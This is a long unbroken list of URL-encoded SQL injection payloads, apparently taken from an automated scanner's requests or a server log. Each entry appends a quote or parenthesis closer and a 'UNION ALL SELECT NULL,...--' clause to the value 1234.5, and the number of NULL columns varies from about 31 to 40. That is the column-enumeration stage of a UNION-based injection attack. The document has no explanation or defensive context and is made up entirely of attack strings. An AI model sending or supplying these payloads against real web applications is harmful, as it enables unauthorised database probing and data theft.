1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 